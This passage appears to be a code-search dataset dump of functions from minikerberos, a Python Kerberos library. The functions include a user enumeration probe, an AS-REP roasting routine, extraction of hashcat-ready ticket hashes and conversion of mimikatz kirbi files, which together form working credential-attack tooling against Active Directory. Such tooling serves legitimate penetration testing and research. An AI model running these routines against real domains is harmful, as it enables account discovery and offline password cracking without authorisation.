To determine which tickets are AS_REP we check for the server principal to be the kerberos service | [
"Returns",
"a",
"list",
"of",
"AS_REP",
"tickets",
"in",
"native",
"format",
"(",
"dict",
")",
".",
"To",
"determine",
"which",
"ticket",
"are",
"AP_REP",
"we",
"check",
"for",
"the",
"server",
"principal",
"to",
"be",
"the",
"kerberos",
"service"
] | train | https://github.com/skelsec/minikerberos/blob/caf14c1d0132119d6e8a8f05120efb7d0824b2c6/minikerberos/ccache.py#L566-L576 |
skelsec/minikerberos | minikerberos/ccache.py | CCACHE.get_hashes | def get_hashes(self, all_hashes = False):
"""
Returns a list of hashes in hashcat-friendly format for tickets with encryption type 23 (which is RC4)
all_hashes: overrides the encryption type filtering and returns hash for all tickets
"""
hashes = []
for cred in self.credentials:
res = Ticket.load(cred.ticket.to_asn1()).native
if int(res['enc-part']['etype']) == 23 or all_hashes == True:
hashes.append(cred.to_hash())
return hashes | python | def get_hashes(self, all_hashes = False):
"""
Returns a list of hashes in hashcat-friendly format for tickets with encryption type 23 (which is RC4)
all_hashes: overrides the encryption type filtering and returns hash for all tickets
"""
hashes = []
for cred in self.credentials:
res = Ticket.load(cred.ticket.to_asn1()).native
if int(res['enc-part']['etype']) == 23 or all_hashes == True:
hashes.append(cred.to_hash())
return hashes | [
"def",
"get_hashes",
"(",
"self",
",",
"all_hashes",
"=",
"False",
")",
":",
"hashes",
"=",
"[",
"]",
"for",
"cred",
"in",
"self",
".",
"credentials",
":",
"res",
"=",
"Ticket",
".",
"load",
"(",
"cred",
".",
"ticket",
".",
"to_asn1",
"(",
")",
")",
".",
"native",
"if",
"int",
"(",
"res",
"[",
"'enc-part'",
"]",
"[",
"'etype'",
"]",
")",
"==",
"23",
"or",
"all_hashes",
"==",
"True",
":",
"hashes",
".",
"append",
"(",
"cred",
".",
"to_hash",
"(",
")",
")",
"return",
"hashes"
] | Returns a list of hashes in hashcat-friendly format for tickets with encryption type 23 (which is RC4)
all_hashes: overrides the encryption type filtering and returns hash for all tickets | [
"Returns",
"a",
"list",
"of",
"hashes",
"in",
"hashcat",
"-",
"firendly",
"format",
"for",
"tickets",
"with",
"encryption",
"type",
"23",
"(",
"which",
"is",
"RC4",
")",
"all_hashes",
":",
"overrides",
"the",
"encryption",
"type",
"filtering",
"and",
"returns",
"hash",
"for",
"all",
"tickets"
] | train | https://github.com/skelsec/minikerberos/blob/caf14c1d0132119d6e8a8f05120efb7d0824b2c6/minikerberos/ccache.py#L578-L590 |
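A usage sketch for an offline-cracking workflow (the file name is a placeholder; CCACHE.from_file is referenced elsewhere in this module):

    from minikerberos.ccache import CCACHE  # assumed import path

    cc = CCACHE.from_file('victim.ccache')
    for h in cc.get_hashes(all_hashes=False):  # etype-23 (RC4) tickets only by default
        print(h)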
skelsec/minikerberos | minikerberos/ccache.py | CCACHE.from_kirbidir | def from_kirbidir(directory_path):
"""
Iterates through all .kirbi files in a given directory and converts all of them into one CCACHE object
"""
cc = CCACHE()
dir_path = os.path.join(os.path.abspath(directory_path), '*.kirbi')
for filename in glob.glob(dir_path):
with open(filename, 'rb') as f:
kirbidata = f.read()
kirbi = KRBCRED.load(kirbidata).native
cc.add_kirbi(kirbi)
return cc | python | def from_kirbidir(directory_path):
"""
Iterates through all .kirbi files in a given directory and converts all of them into one CCACHE object
"""
cc = CCACHE()
dir_path = os.path.join(os.path.abspath(directory_path), '*.kirbi')
for filename in glob.glob(dir_path):
with open(filename, 'rb') as f:
kirbidata = f.read()
kirbi = KRBCRED.load(kirbidata).native
cc.add_kirbi(kirbi)
return cc | [
"def",
"from_kirbidir",
"(",
"directory_path",
")",
":",
"cc",
"=",
"CCACHE",
"(",
")",
"dir_path",
"=",
"os",
".",
"path",
".",
"join",
"(",
"os",
".",
"path",
".",
"abspath",
"(",
"directory_path",
")",
",",
"'*.kirbi'",
")",
"for",
"filename",
"in",
"glob",
".",
"glob",
"(",
"dir_path",
")",
":",
"with",
"open",
"(",
"filename",
",",
"'rb'",
")",
"as",
"f",
":",
"kirbidata",
"=",
"f",
".",
"read",
"(",
")",
"kirbi",
"=",
"KRBCRED",
".",
"load",
"(",
"kirbidata",
")",
".",
"native",
"cc",
".",
"add_kirbi",
"(",
"kirbi",
")",
"return",
"cc"
] | Iterates through all .kirbi files in a given directory and converts all of them into one CCACHE object | [
"Iterates",
"trough",
"all",
".",
"kirbi",
"files",
"in",
"a",
"given",
"directory",
"and",
"converts",
"all",
"of",
"them",
"into",
"one",
"CCACHE",
"object"
] | train | https://github.com/skelsec/minikerberos/blob/caf14c1d0132119d6e8a8f05120efb7d0824b2c6/minikerberos/ccache.py#L638-L650 |
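Merging a directory of mimikatz .kirbi files into a single ccache, as a sketch (paths are placeholders):

    from minikerberos.ccache import CCACHE  # assumed import path

    cc = CCACHE.from_kirbidir('./tickets')  # picks up every *.kirbi in the directory
    cc.to_file('merged.ccache')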
skelsec/minikerberos | minikerberos/ccache.py | CCACHE.to_kirbidir | def to_kirbidir(self, directory_path):
"""
Converts all credential objects in the CCACHE object to the kirbi file format used by mimikatz.
The kirbi file format supports one credential per file, so prepare for a lot of files being generated.
directory_path: str the directory to write the kirbi files to
"""
kf_abs = os.path.abspath(directory_path)
for cred in self.credentials:
kirbi, filename = cred.to_kirbi()
filename = '%s.kirbi' % filename.replace('..','!')
filepath = os.path.join(kf_abs, filename)
with open(filepath, 'wb') as o:
o.write(kirbi.dump()) | python | def to_kirbidir(self, directory_path):
"""
Converts all credential objects in the CCACHE object to the kirbi file format used by mimikatz.
The kirbi file format supports one credential per file, so prepare for a lot of files being generated.
directory_path: str the directory to write the kirbi files to
"""
kf_abs = os.path.abspath(directory_path)
for cred in self.credentials:
kirbi, filename = cred.to_kirbi()
filename = '%s.kirbi' % filename.replace('..','!')
filepath = os.path.join(kf_abs, filename)
with open(filepath, 'wb') as o:
o.write(kirbi.dump()) | [
"def",
"to_kirbidir",
"(",
"self",
",",
"directory_path",
")",
":",
"kf_abs",
"=",
"os",
".",
"path",
".",
"abspath",
"(",
"directory_path",
")",
"for",
"cred",
"in",
"self",
".",
"credentials",
":",
"kirbi",
",",
"filename",
"=",
"cred",
".",
"to_kirbi",
"(",
")",
"filename",
"=",
"'%s.kirbi'",
"%",
"filename",
".",
"replace",
"(",
"'..'",
",",
"'!'",
")",
"filepath",
"=",
"os",
".",
"path",
".",
"join",
"(",
"kf_abs",
",",
"filename",
")",
"with",
"open",
"(",
"filepath",
",",
"'wb'",
")",
"as",
"o",
":",
"o",
".",
"write",
"(",
"kirbi",
".",
"dump",
"(",
")",
")"
] | Converts all credential objects in the CCACHE object to the kirbi file format used by mimikatz.
The kirbi file format supports one credential per file, so prepare for a lot of files being generated.
directory_path: str the directory to write the kirbi files to | [
"Converts",
"all",
"credential",
"object",
"in",
"the",
"CCACHE",
"object",
"to",
"the",
"kirbi",
"file",
"format",
"used",
"by",
"mimikatz",
".",
"The",
"kirbi",
"file",
"format",
"supports",
"one",
"credential",
"per",
"file",
"so",
"prepare",
"for",
"a",
"lot",
"of",
"files",
"being",
"generated",
".",
"directory_path",
":",
"str",
"the",
"directory",
"to",
"write",
"the",
"kirbi",
"files",
"to"
] | train | https://github.com/skelsec/minikerberos/blob/caf14c1d0132119d6e8a8f05120efb7d0824b2c6/minikerberos/ccache.py#L652-L665 |
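And the reverse direction, exporting each credential in a ccache as its own .kirbi file (paths are placeholders; the output directory is assumed to exist):

    from minikerberos.ccache import CCACHE  # assumed import path

    cc = CCACHE.from_file('merged.ccache')
    cc.to_kirbidir('./exported')  # writes one .kirbi file per credential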
skelsec/minikerberos | minikerberos/ccache.py | CCACHE.to_file | def to_file(self, filename):
"""
Writes the contents of the CCACHE object to a file
"""
with open(filename, 'wb') as f:
f.write(self.to_bytes()) | python | def to_file(self, filename):
"""
Writes the contents of the CCACHE object to a file
"""
with open(filename, 'wb') as f:
f.write(self.to_bytes()) | [
"def",
"to_file",
"(",
"self",
",",
"filename",
")",
":",
"with",
"open",
"(",
"filename",
",",
"'wb'",
")",
"as",
"f",
":",
"f",
".",
"write",
"(",
"self",
".",
"to_bytes",
"(",
")",
")"
] | Writes the contents of the CCACHE object to a file | [
"Writes",
"the",
"contents",
"of",
"the",
"CCACHE",
"object",
"to",
"a",
"file"
] | train | https://github.com/skelsec/minikerberos/blob/caf14c1d0132119d6e8a8f05120efb7d0824b2c6/minikerberos/ccache.py#L674-L679 |
skelsec/minikerberos | minikerberos/common.py | print_table | def print_table(lines, separate_head=True):
"""Prints a formatted table given a 2 dimensional array"""
#Count the column width
widths = []
for line in lines:
for i,size in enumerate([len(x) for x in line]):
while i >= len(widths):
widths.append(0)
if size > widths[i]:
widths[i] = size
#Generate the format string to pad the columns
print_string = ""
for i,width in enumerate(widths):
print_string += "{" + str(i) + ":" + str(width) + "} | "
if (len(print_string) == 0):
return
print_string = print_string[:-3]
#Print the actual data
for i,line in enumerate(lines):
print(print_string.format(*line))
if (i == 0 and separate_head):
print("-"*(sum(widths)+3*(len(widths)-1))) | python | def print_table(lines, separate_head=True):
"""Prints a formatted table given a 2 dimensional array"""
#Count the column width
widths = []
for line in lines:
for i,size in enumerate([len(x) for x in line]):
while i >= len(widths):
widths.append(0)
if size > widths[i]:
widths[i] = size
#Generate the format string to pad the columns
print_string = ""
for i,width in enumerate(widths):
print_string += "{" + str(i) + ":" + str(width) + "} | "
if (len(print_string) == 0):
return
print_string = print_string[:-3]
#Print the actual data
for i,line in enumerate(lines):
print(print_string.format(*line))
if (i == 0 and separate_head):
print("-"*(sum(widths)+3*(len(widths)-1))) | [
"def",
"print_table",
"(",
"lines",
",",
"separate_head",
"=",
"True",
")",
":",
"#Count the column width",
"widths",
"=",
"[",
"]",
"for",
"line",
"in",
"lines",
":",
"for",
"i",
",",
"size",
"in",
"enumerate",
"(",
"[",
"len",
"(",
"x",
")",
"for",
"x",
"in",
"line",
"]",
")",
":",
"while",
"i",
">=",
"len",
"(",
"widths",
")",
":",
"widths",
".",
"append",
"(",
"0",
")",
"if",
"size",
">",
"widths",
"[",
"i",
"]",
":",
"widths",
"[",
"i",
"]",
"=",
"size",
"#Generate the format string to pad the columns",
"print_string",
"=",
"\"\"",
"for",
"i",
",",
"width",
"in",
"enumerate",
"(",
"widths",
")",
":",
"print_string",
"+=",
"\"{\"",
"+",
"str",
"(",
"i",
")",
"+",
"\":\"",
"+",
"str",
"(",
"width",
")",
"+",
"\"} | \"",
"if",
"(",
"len",
"(",
"print_string",
")",
"==",
"0",
")",
":",
"return",
"print_string",
"=",
"print_string",
"[",
":",
"-",
"3",
"]",
"#Print the actual data",
"for",
"i",
",",
"line",
"in",
"enumerate",
"(",
"lines",
")",
":",
"print",
"(",
"print_string",
".",
"format",
"(",
"*",
"line",
")",
")",
"if",
"(",
"i",
"==",
"0",
"and",
"separate_head",
")",
":",
"print",
"(",
"\"-\"",
"*",
"(",
"sum",
"(",
"widths",
")",
"+",
"3",
"*",
"(",
"len",
"(",
"widths",
")",
"-",
"1",
")",
")",
")"
] | Prints a formatted table given a 2 dimensional array | [
"Prints",
"a",
"formatted",
"table",
"given",
"a",
"2",
"dimensional",
"array"
] | train | https://github.com/skelsec/minikerberos/blob/caf14c1d0132119d6e8a8f05120efb7d0824b2c6/minikerberos/common.py#L246-L269 |
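print_table is self-contained, so a direct example works (data invented; import path assumed from the repository layout):

    from minikerberos.common import print_table  # assumed import path

    rows = [['name', 'realm'], ['victim', 'TEST.CORP'], ['svc_sql', 'TEST.CORP']]
    print_table(rows)
    # prints the columns padded to equal width, separated by ' | ',
    # with a dashed rule under the header row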
skelsec/minikerberos | minikerberos/common.py | KerberosCredential.get_key_for_enctype | def get_key_for_enctype(self, etype):
"""
Returns the encryption key bytes for the encryption type.
"""
if etype == EncryptionType.AES256_CTS_HMAC_SHA1_96:
if self.kerberos_key_aes_256:
return bytes.fromhex(self.kerberos_key_aes_256)
if self.password is not None:
salt = (self.domain.upper() + self.username).encode()
return string_to_key(Enctype.AES256, self.password.encode(), salt).contents
raise Exception('There is no key for AES256 encryption')
elif etype == EncryptionType.AES128_CTS_HMAC_SHA1_96:
if self.kerberos_key_aes_128:
return bytes.fromhex(self.kerberos_key_aes_128)
if self.password is not None:
salt = (self.domain.upper() + self.username).encode()
return string_to_key(Enctype.AES128, self.password.encode(), salt).contents
raise Exception('There is no key for AES128 encryption')
elif etype == EncryptionType.ARCFOUR_HMAC_MD5:
if self.kerberos_key_rc4:
return bytes.fromhex(self.kerberos_key_rc4)
if self.nt_hash:
return bytes.fromhex(self.nt_hash)
elif self.password:
self.nt_hash = hashlib.new('md4', self.password.encode('utf-16-le')).hexdigest().upper()
return bytes.fromhex(self.nt_hash)
else:
raise Exception('There is no key for RC4 encryption')
elif etype == EncryptionType.DES3_CBC_SHA1:
if self.kerberos_key_des3:
return bytes.fromhex(self.kerberos_key_des3)
elif self.password:
salt = (self.domain.upper() + self.username).encode()
return string_to_key(Enctype.DES3, self.password.encode(), salt).contents
else:
raise Exception('There is no key for DES3 encryption')
elif etype == EncryptionType.DES_CBC_MD5: #etype == EncryptionType.DES_CBC_CRC or etype == EncryptionType.DES_CBC_MD4 or
if self.kerberos_key_des:
return bytes.fromhex(self.kerberos_key_des)
elif self.password:
salt = (self.domain.upper() + self.username).encode()
return string_to_key(Enctype.DES_MD5, self.password.encode(), salt).contents
else:
raise Exception('There is no key for DES encryption')
else:
raise Exception('Unsupported encryption type: %s' % etype.name) | python | def get_key_for_enctype(self, etype):
"""
Returns the encryption key bytes for the encryption type.
"""
if etype == EncryptionType.AES256_CTS_HMAC_SHA1_96:
if self.kerberos_key_aes_256:
return bytes.fromhex(self.kerberos_key_aes_256)
if self.password is not None:
salt = (self.domain.upper() + self.username).encode()
return string_to_key(Enctype.AES256, self.password.encode(), salt).contents
raise Exception('There is no key for AES256 encryption')
elif etype == EncryptionType.AES128_CTS_HMAC_SHA1_96:
if self.kerberos_key_aes_128:
return bytes.fromhex(self.kerberos_key_aes_128)
if self.password is not None:
salt = (self.domain.upper() + self.username).encode()
return string_to_key(Enctype.AES128, self.password.encode(), salt).contents
raise Exception('There is no key for AES128 encryption')
elif etype == EncryptionType.ARCFOUR_HMAC_MD5:
if self.kerberos_key_rc4:
return bytes.fromhex(self.kerberos_key_rc4)
if self.nt_hash:
return bytes.fromhex(self.nt_hash)
elif self.password:
self.nt_hash = hashlib.new('md4', self.password.encode('utf-16-le')).hexdigest().upper()
return bytes.fromhex(self.nt_hash)
else:
raise Exception('There is no key for RC4 encryption')
elif etype == EncryptionType.DES3_CBC_SHA1:
if self.kerberos_key_des3:
return bytes.fromhex(self.kerberos_key_des3)
elif self.password:
salt = (self.domain.upper() + self.username).encode()
return string_to_key(Enctype.DES3, self.password.encode(), salt).contents
else:
raise Exception('There is no key for DES3 encryption')
elif etype == EncryptionType.DES_CBC_MD5: #etype == EncryptionType.DES_CBC_CRC or etype == EncryptionType.DES_CBC_MD4 or
if self.kerberos_key_des:
return bytes.fromhex(self.kerberos_key_des)
elif self.password:
salt = (self.domain.upper() + self.username).encode()
return string_to_key(Enctype.DES_MD5, self.password.encode(), salt).contents
else:
raise Exception('There is no key for DES encryption')
else:
raise Exception('Unsupported encryption type: %s' % etype.name) | [
"def",
"get_key_for_enctype",
"(",
"self",
",",
"etype",
")",
":",
"if",
"etype",
"==",
"EncryptionType",
".",
"AES256_CTS_HMAC_SHA1_96",
":",
"if",
"self",
".",
"kerberos_key_aes_256",
":",
"return",
"bytes",
".",
"fromhex",
"(",
"self",
".",
"kerberos_key_aes_256",
")",
"if",
"self",
".",
"password",
"is",
"not",
"None",
":",
"salt",
"=",
"(",
"self",
".",
"domain",
".",
"upper",
"(",
")",
"+",
"self",
".",
"username",
")",
".",
"encode",
"(",
")",
"return",
"string_to_key",
"(",
"Enctype",
".",
"AES256",
",",
"self",
".",
"password",
".",
"encode",
"(",
")",
",",
"salt",
")",
".",
"contents",
"raise",
"Exception",
"(",
"'There is no key for AES256 encryption'",
")",
"elif",
"etype",
"==",
"EncryptionType",
".",
"AES128_CTS_HMAC_SHA1_96",
":",
"if",
"self",
".",
"kerberos_key_aes_128",
":",
"return",
"bytes",
".",
"fromhex",
"(",
"self",
".",
"kerberos_key_aes_128",
")",
"if",
"self",
".",
"password",
"is",
"not",
"None",
":",
"salt",
"=",
"(",
"self",
".",
"domain",
".",
"upper",
"(",
")",
"+",
"self",
".",
"username",
")",
".",
"encode",
"(",
")",
"return",
"string_to_key",
"(",
"Enctype",
".",
"AES128",
",",
"self",
".",
"password",
".",
"encode",
"(",
")",
",",
"salt",
")",
".",
"contents",
"raise",
"Exception",
"(",
"'There is no key for AES128 encryption'",
")",
"elif",
"etype",
"==",
"EncryptionType",
".",
"ARCFOUR_HMAC_MD5",
":",
"if",
"self",
".",
"kerberos_key_rc4",
":",
"return",
"bytes",
".",
"fromhex",
"(",
"self",
".",
"kerberos_key_rc4",
")",
"if",
"self",
".",
"nt_hash",
":",
"return",
"bytes",
".",
"fromhex",
"(",
"self",
".",
"nt_hash",
")",
"elif",
"self",
".",
"password",
":",
"self",
".",
"nt_hash",
"=",
"hashlib",
".",
"new",
"(",
"'md4'",
",",
"self",
".",
"password",
".",
"encode",
"(",
"'utf-16-le'",
")",
")",
".",
"hexdigest",
"(",
")",
".",
"upper",
"(",
")",
"return",
"bytes",
".",
"fromhex",
"(",
"self",
".",
"nt_hash",
")",
"else",
":",
"raise",
"Exception",
"(",
"'There is no key for RC4 encryption'",
")",
"elif",
"etype",
"==",
"EncryptionType",
".",
"DES3_CBC_SHA1",
":",
"if",
"self",
".",
"kerberos_key_des3",
":",
"return",
"bytes",
".",
"fromhex",
"(",
"self",
".",
"kerberos_key_des",
")",
"elif",
"self",
".",
"password",
":",
"salt",
"=",
"(",
"self",
".",
"domain",
".",
"upper",
"(",
")",
"+",
"self",
".",
"username",
")",
".",
"encode",
"(",
")",
"return",
"string_to_key",
"(",
"Enctype",
".",
"DES3",
",",
"self",
".",
"password",
".",
"encode",
"(",
")",
",",
"salt",
")",
".",
"contents",
"else",
":",
"raise",
"Exception",
"(",
"'There is no key for DES3 encryption'",
")",
"elif",
"etype",
"==",
"EncryptionType",
".",
"DES_CBC_MD5",
":",
"#etype == EncryptionType.DES_CBC_CRC or etype == EncryptionType.DES_CBC_MD4 or ",
"if",
"self",
".",
"kerberos_key_des",
":",
"return",
"bytes",
".",
"fromhex",
"(",
"self",
".",
"kerberos_key_des",
")",
"elif",
"self",
".",
"password",
":",
"salt",
"=",
"(",
"self",
".",
"domain",
".",
"upper",
"(",
")",
"+",
"self",
".",
"username",
")",
".",
"encode",
"(",
")",
"return",
"string_to_key",
"(",
"Enctype",
".",
"DES_MD5",
",",
"self",
".",
"password",
".",
"encode",
"(",
")",
",",
"salt",
")",
".",
"contents",
"else",
":",
"raise",
"Exception",
"(",
"'There is no key for DES3 encryption'",
")",
"else",
":",
"raise",
"Exception",
"(",
"'Unsupported encryption type: %s'",
"%",
"etype",
".",
"name",
")"
] | Returns the encryption key bytes for the encryption type. | [
"Returns",
"the",
"encryption",
"key",
"bytes",
"for",
"the",
"enctryption",
"type",
"."
] | train | https://github.com/skelsec/minikerberos/blob/caf14c1d0132119d6e8a8f05120efb7d0824b2c6/minikerberos/common.py#L54-L101 |
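The ARCFOUR branch is easy to verify independently: the RC4 key is just the MD4 hash of the UTF-16-LE password, i.e. the NT hash. A standalone sketch (password invented; note hashlib's md4 is unavailable on some OpenSSL 3 builds and then raises ValueError):

    import hashlib

    password = 'Passw0rd!'
    nt_hash = hashlib.new('md4', password.encode('utf-16-le')).hexdigest().upper()
    rc4_key = bytes.fromhex(nt_hash)  # what get_key_for_enctype returns for ARCFOUR_HMAC_MD5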
skelsec/minikerberos | minikerberos/common.py | KerberosCredential.from_connection_string | def from_connection_string(s):
"""
Credential input format:
<domain>/<username>/<secret_type>:<secret>@<dc_ip_or_hostname>
"""
cred = KerberosCredential()
cred.domain, t = s.split('/', 1)
cred.username, t = t.split('/', 1)
secret_type, t = t.split(':', 1)
secret, target = t.rsplit('@', 1)
st = KerberosSecretType(secret_type.upper())
if st == KerberosSecretType.PASSWORD or st == KerberosSecretType.PW or st == KerberosSecretType.PASS:
cred.password = secret
elif st == KerberosSecretType.NT or st == KerberosSecretType.RC4:
cred.nt_hash = secret
cred.kerberos_key_rc4 = secret
elif st == KerberosSecretType.AES:
cred.kerberos_key_aes_256 = secret
cred.kerberos_key_aes_128 = secret
elif st == KerberosSecretType.DES:
cred.kerberos_key_des = secret
elif st == KerberosSecretType.DES3 or st == KerberosSecretType.TDES:
cred.kerberos_key_des3 = secret
elif st == KerberosSecretType.CCACHE:
cred.ccache = CCACHE.from_file(secret)
return cred | python | def from_connection_string(s):
"""
Credential input format:
<domain>/<username>/<secret_type>:<secret>@<dc_ip_or_hostname>
"""
cred = KerberosCredential()
cred.domain, t = s.split('/', 1)
cred.username, t = t.split('/', 1)
secret_type, t = t.split(':', 1)
secret, target = t.rsplit('@', 1)
st = KerberosSecretType(secret_type.upper())
if st == KerberosSecretType.PASSWORD or st == KerberosSecretType.PW or st == KerberosSecretType.PASS:
cred.password = secret
elif st == KerberosSecretType.NT or st == KerberosSecretType.RC4:
cred.nt_hash = secret
cred.kerberos_key_rc4 = secret
elif st == KerberosSecretType.AES:
cred.kerberos_key_aes_256 = secret
cred.kerberos_key_aes_128 = secret
elif st == KerberosSecretType.DES:
cred.kerberos_key_des = secret
elif st == KerberosSecretType.DES3 or st == KerberosSecretType.TDES:
cred.kerberos_key_des3 = secret
elif st == KerberosSecretType.CCACHE:
cred.ccache = CCACHE.from_file(secret)
return cred | [
"def",
"from_connection_string",
"(",
"s",
")",
":",
"cred",
"=",
"KerberosCredential",
"(",
")",
"cred",
".",
"domain",
",",
"t",
"=",
"s",
".",
"split",
"(",
"'/'",
",",
"1",
")",
"cred",
".",
"username",
",",
"t",
"=",
"t",
".",
"split",
"(",
"'/'",
",",
"1",
")",
"secret_type",
",",
"t",
"=",
"t",
".",
"split",
"(",
"':'",
",",
"1",
")",
"secret",
",",
"target",
"=",
"t",
".",
"rsplit",
"(",
"'@'",
",",
"1",
")",
"st",
"=",
"KerberosSecretType",
"(",
"secret_type",
".",
"upper",
"(",
")",
")",
"if",
"st",
"==",
"KerberosSecretType",
".",
"PASSWORD",
"or",
"st",
"==",
"KerberosSecretType",
".",
"PW",
"or",
"st",
"==",
"KerberosSecretType",
".",
"PASS",
":",
"cred",
".",
"password",
"=",
"secret",
"elif",
"st",
"==",
"KerberosSecretType",
".",
"NT",
"or",
"st",
"==",
"KerberosSecretType",
".",
"RC4",
":",
"cred",
".",
"nt_hash",
"=",
"secret",
"cred",
".",
"kerberos_key_rc4",
"=",
"secret",
"elif",
"st",
"==",
"KerberosSecretType",
".",
"AES",
":",
"cred",
".",
"kerberos_key_aes_256",
"=",
"secret",
"cred",
".",
"kerberos_key_aes_128",
"=",
"secret",
"elif",
"st",
"==",
"KerberosSecretType",
".",
"DES",
":",
"cred",
".",
"kerberos_key_des",
"=",
"secret",
"elif",
"st",
"==",
"KerberosSecretType",
".",
"DES3",
"or",
"st",
"==",
"KerberosSecretType",
".",
"TDES",
":",
"cred",
".",
"kerberos_key_des3",
"=",
"secret",
"elif",
"st",
"==",
"KerberosSecretType",
".",
"CCACHE",
":",
"cred",
".",
"ccache",
"=",
"CCACHE",
".",
"from_file",
"(",
"secret",
")",
"return",
"cred"
] | Credential input format:
<domain>/<username>/<secret_type>:<secret>@<dc_ip_or_hostname> | [
"Credential",
"input",
"format",
":",
"<domain",
">",
"/",
"<username",
">",
"/",
"<secret_type",
">",
":",
"<secret",
">"
] | train | https://github.com/skelsec/minikerberos/blob/caf14c1d0132119d6e8a8f05120efb7d0824b2c6/minikerberos/common.py#L174-L208 |
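Sketches matching the documented connection-string grammar (all values invented; import path assumed from the repository layout):

    from minikerberos.common import KerberosCredential  # assumed import path

    cred_pw = KerberosCredential.from_connection_string('TEST.CORP/victim/password:Passw0rd!@10.0.0.1')
    cred_nt = KerberosCredential.from_connection_string('TEST.CORP/victim/nt:921a7fece11f4d8c72432e41e40d0372@dc01')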
skelsec/minikerberos | minikerberos/security.py | KerberosUserEnum.run | def run(self, realm, users):
"""
Requests a TGT in the name of the users specified in users.
Returns a list of usernames that are in the domain.
realm: kerberos realm (domain name of the corp)
users: list : list of usernames to test
"""
existing_users = []
for user in users:
logging.debug('Probing user %s' % user)
req = KerberosUserEnum.construct_tgt_req(realm, user)
rep = self.ksoc.sendrecv(req.dump(), throw = False)
if rep.name != 'KRB_ERROR':
# user doesn't need preauth, but it exists
existing_users.append(user)
elif rep.native['error-code'] != KerberosErrorCode.KDC_ERR_PREAUTH_REQUIRED.value:
# any other error means user doesn't exist
continue
else:
# preauth needed, only if user exists
existing_users.append(user)
return existing_users | python | def run(self, realm, users):
"""
Requests a TGT in the name of the users specified in users.
Returns a list of usernames that are in the domain.
realm: kerberos realm (domain name of the corp)
users: list : list of usernames to test
"""
existing_users = []
for user in users:
logging.debug('Probing user %s' % user)
req = KerberosUserEnum.construct_tgt_req(realm, user)
rep = self.ksoc.sendrecv(req.dump(), throw = False)
if rep.name != 'KRB_ERROR':
# user doesn't need preauth, but it exists
existing_users.append(user)
elif rep.native['error-code'] != KerberosErrorCode.KDC_ERR_PREAUTH_REQUIRED.value:
# any other error means user doesn't exist
continue
else:
# preauth needed, only if user exists
existing_users.append(user)
return existing_users | [
"def",
"run",
"(",
"self",
",",
"realm",
",",
"users",
")",
":",
"existing_users",
"=",
"[",
"]",
"for",
"user",
"in",
"users",
":",
"logging",
".",
"debug",
"(",
"'Probing user %s'",
"%",
"user",
")",
"req",
"=",
"KerberosUserEnum",
".",
"construct_tgt_req",
"(",
"realm",
",",
"user",
")",
"rep",
"=",
"self",
".",
"ksoc",
".",
"sendrecv",
"(",
"req",
".",
"dump",
"(",
")",
",",
"throw",
"=",
"False",
")",
"if",
"rep",
".",
"name",
"!=",
"'KRB_ERROR'",
":",
"# user doesnt need preauth, but it exists",
"existing_users",
".",
"append",
"(",
"user",
")",
"elif",
"rep",
".",
"native",
"[",
"'error-code'",
"]",
"!=",
"KerberosErrorCode",
".",
"KDC_ERR_PREAUTH_REQUIRED",
".",
"value",
":",
"# any other error means user doesnt exist",
"continue",
"else",
":",
"# preauth needed, only if user exists",
"existing_users",
".",
"append",
"(",
"user",
")",
"return",
"existing_users"
] | Requests a TGT in the name of the users specified in users.
Returns a list of usernames that are in the domain.
realm: kerberos realm (domain name of the corp)
users: list : list of usernames to test | [
"Requests",
"a",
"TGT",
"in",
"the",
"name",
"of",
"the",
"users",
"specified",
"in",
"users",
".",
"Returns",
"a",
"list",
"of",
"usernames",
"that",
"are",
"in",
"the",
"domain",
"."
] | train | https://github.com/skelsec/minikerberos/blob/caf14c1d0132119d6e8a8f05120efb7d0824b2c6/minikerberos/security.py#L43-L69 |
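A heavily hedged sketch; the enumerator's constructor and its kerberos socket are not shown in this excerpt, so both are assumptions here:

    def probe_users(ksoc, realm, candidates):
        # ksoc: a connected KerberosSocket-like object (construction not shown above)
        enumerator = KerberosUserEnum(ksoc)  # constructor signature assumed
        return enumerator.run(realm, candidates)  # returns only the names that exist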
skelsec/minikerberos | minikerberos/security.py | APREPRoast.run | def run(self, creds, override_etype = [23]):
"""
Requests TGT tickets for all users specified in the targets list
creds: list : the users to request the TGT tickets for
override_etype: list : list of supported encryption types
"""
tgts = []
for cred in creds:
try:
kcomm = KerbrosComm(cred, self.ksoc)
kcomm.get_TGT(override_etype = override_etype, decrypt_tgt = False)
tgts.append(kcomm.kerberos_TGT)
except Exception as e:
logger.debug('Error while roasting client %s/%s Reason: %s' % (cred.domain, cred.username, str(e)))
continue
results = []
for tgt in tgts:
results.append(TGTTicket2hashcat(tgt))
return results | python | def run(self, creds, override_etype = [23]):
"""
Requests TGT tickets for all users specified in the targets list
creds: list : the users to request the TGT tickets for
override_etype: list : list of supported encryption types
"""
tgts = []
for cred in creds:
try:
kcomm = KerbrosComm(cred, self.ksoc)
kcomm.get_TGT(override_etype = override_etype, decrypt_tgt = False)
tgts.append(kcomm.kerberos_TGT)
except Exception as e:
logger.debug('Error while roasting client %s/%s Reason: %s' % (cred.domain, cred.username, str(e)))
continue
results = []
for tgt in tgts:
results.append(TGTTicket2hashcat(tgt))
return results | [
"def",
"run",
"(",
"self",
",",
"creds",
",",
"override_etype",
"=",
"[",
"23",
"]",
")",
":",
"tgts",
"=",
"[",
"]",
"for",
"cred",
"in",
"creds",
":",
"try",
":",
"kcomm",
"=",
"KerbrosComm",
"(",
"cred",
",",
"self",
".",
"ksoc",
")",
"kcomm",
".",
"get_TGT",
"(",
"override_etype",
"=",
"override_etype",
",",
"decrypt_tgt",
"=",
"False",
")",
"tgts",
".",
"append",
"(",
"kcomm",
".",
"kerberos_TGT",
")",
"except",
"Exception",
"as",
"e",
":",
"logger",
".",
"debug",
"(",
"'Error while roasting client %s/%s Reason: %s'",
"%",
"(",
"cred",
".",
"domain",
",",
"cred",
".",
"username",
",",
"str",
"(",
"e",
")",
")",
")",
"continue",
"results",
"=",
"[",
"]",
"for",
"tgt",
"in",
"tgts",
":",
"results",
".",
"append",
"(",
"TGTTicket2hashcat",
"(",
"tgt",
")",
")",
"return",
"results"
] | Requests TGT tickets for all users specified in the targets list
creds: list : the users to request the TGT tickets for
override_etype: list : list of supported encryption types | [
"Requests",
"TGT",
"tickets",
"for",
"all",
"users",
"specified",
"in",
"the",
"targets",
"list",
"creds",
":",
"list",
":",
"the",
"users",
"to",
"request",
"the",
"TGT",
"tickets",
"for",
"override_etype",
":",
"list",
":",
"list",
"of",
"supported",
"encryption",
"types"
